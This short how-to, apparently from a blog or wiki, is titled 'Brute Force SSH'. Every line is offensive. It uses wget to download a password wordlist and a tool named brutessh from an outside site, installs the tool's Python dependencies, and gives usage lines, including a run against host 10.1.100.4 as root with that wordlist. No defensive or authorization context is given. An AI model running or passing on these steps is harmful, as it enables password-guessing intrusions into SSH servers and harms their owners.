Brute Force SSH

wget http://zeldor.biz/other/bruteforce/passlist.txt
wget http://zeldor.biz/other/bruteforce/brutessh.zip
unzip brutessh.zip
cd brutessh
apt-get install python-crypto python-paramiko

Usage

python brutessh.py -h targethost -u user -d passwordict
python brutessh.py -h 10.1.100.4 -u root -d passlist.txt